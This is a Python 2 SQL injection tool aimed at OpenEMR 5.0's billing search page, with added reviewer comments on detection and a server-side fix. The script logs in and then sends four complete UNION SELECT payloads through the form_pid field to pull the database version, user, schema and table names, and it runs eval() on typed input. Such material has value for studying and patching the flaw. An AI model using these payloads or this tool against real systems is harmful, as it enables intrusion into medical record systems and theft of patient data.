- #Project OpenEMR 5.0
- #automatic sql injection
- from bs4 import BeautifulSoup
- import re
- import getpass
- import mechanize
# Reviewer summary: Python 2 script (print statement, raw_input) that logs in to
# an OpenEMR site with operator-supplied credentials, then repeatedly submits
# one of four fixed UNION SELECT strings in the form_pid field of
# sl_eob_search.php and prints elements scraped from the response page.
# The paste lost its indentation: the statements after `while 1:` are presumably
# the loop body through the last line -- confirm before relying on that.
# Defensive reading: every request is made from an authenticated session, and
# the strings below only have an effect if form_pid is placed inside a quoted
# SQL literal without escaping (presumably the case in the affected release;
# the server code is not shown here). Binding form_pid as a query parameter on
# the server side removes the injection point.
- intro = """
- '||''''| '|| ||' '||''|.
- ... ... ... .... .. ... || . ||| ||| || ||
- .| '|. ||' || .|...|| || || ||''| |'|..'|| ||''|'
- || || || | || || || || | '|' || || |.
- '|..|' ||...' '|...' .||. ||. .||.....| .|. | .||. .||. '|'
- || version 5.0.0
- '''' SQL Injection Tool
- """
- print intro+"\n"
# Both URLs are built with plain http://, so the username and password entered
# below travel unencrypted.
- host = raw_input("\nEnter Host: ")
- url = ("http://"+host+"/openemr/interface/login/login.php?site=default")
# NOTE(review): the path repeats "sl_eob_search.php" as trailing path info;
# whether that is deliberate cannot be told from this listing.
- vulnurl = ("http://"+host+"/openemr/interface/billing/sl_eob_search.php/sl_eob_search.php")
- br = mechanize.Browser()
- br.set_handle_robots(False)  # robots.txt is not consulted
- br.set_handle_redirect(True)  # HTTP redirects are followed
- r = br.open(url)  # r is never read afterwards
- br.select_form(nr = 0)  # first form on the login page
- print "Login\n-----"
- name = raw_input("Username: ")
- passw = getpass.getpass("Password: ")
- br.form["authUser"] = name
- br.form["clearPass"] = passw
- logged_in = br.submit()  # NOTE(review): the response is never checked, so a failed login goes unnoticed
# Four fixed strings. Each one closes a quoted value with ', appends a
# 17-column UNION SELECT whose ninth column carries the value of interest, and
# ends with # so the rest of the original statement is treated as a comment.
# Detection: a form_pid value containing a single quote, "union select" or
# INFORMATION_SCHEMA in a request to sl_eob_search.php does not look like a
# normal search value and is a usable signal in web-server and WAF logs.
- version = "' union select 1,2,3,4,5,6,7,8,version(),10,11,12,13,14,15,16,17#"
- user = "' union select 1,2,3,4,5,6,7,8,user(),10,11,12,13,14,15,16,17#"
- database ="' union select 1,2,3,4,5,6,7,8,schema(),10,11,12,13,14,15,16,17#"
# 0x696e666f726d6174696f6e5f736368656d61 is the hex form of "information_schema".
# The subquery concatenates table_name from INFORMATION_SCHEMA.COLUMNS for every
# schema except that one, so the output is not limited to the "main database"
# that the menu text below promises.
- tables = "' union select 1,2,3,4,5,6,7,8,(SELECT(@x)FROM(SELECT(@x:=0x00),(SELECT(0)FROM(INFORMATION_SCHEMA.COLUMNS)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,table_name,0x2c))))x),10,11,12,13,14,15,16,17#"
- while 1:
- x = br.open(vulnurl)  # x is never read; the page is reopened on every pass
- br.select_form(nr = 0)  # first form on the search page
- print "version = print Mysql Version\nuser = print user of Website\ndatabase = print main database \ntables = Print all tables of Main database"
# NOTE(review): eval() on raw_input executes whatever is typed as Python in this
# process. It is used here only to turn a typed name into one of the four
# strings above; any other name raises NameError and ends the script. A dict
# lookup would give the same mapping without evaluating input as code.
- input1 = eval(raw_input("\nWhats your choice? "))
- br.form["form_pid"] = "".join(input1)  # "".join() on a str returns the same str
- query = br.submit()
- end = query.read()
- soup = BeautifulSoup(end,"html.parser")
# Selects every element whose onclick attribute equals "return npopup(2)";
# presumably the injected column is rendered inside such an element -- not
# verifiable from this listing.
- href = soup.find_all(onclick="return npopup(2)")
- print href
- print "\n\n"